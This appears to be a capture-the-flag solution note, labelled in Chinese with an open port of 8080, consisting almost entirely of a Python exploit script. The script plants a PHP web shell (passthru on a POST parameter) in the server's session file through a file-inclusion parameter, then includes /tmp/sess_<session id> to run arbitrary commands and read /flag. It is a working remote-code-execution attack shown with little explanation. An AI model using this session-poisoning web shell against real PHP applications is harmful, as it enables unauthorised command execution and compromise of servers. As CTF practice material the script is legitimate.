- 开放端口:
8080
exp:
#!/usr/bin/env python
# coding: utf-8
from time import sleep
import requests
url = 'http://127.0.0.1:8080'
s = requests.session()
def execute(cmd):
params = {
'file': '<?php passthru($_POST["cmd"]); ?>'
}
r = s.get(url, params=params)
params['file'] = '/tmp/sess_' + r.cookies['PHPSESSID']
r = s.post(url, params=params, data={'cmd': cmd})
return r.text
print execute('cat /flag')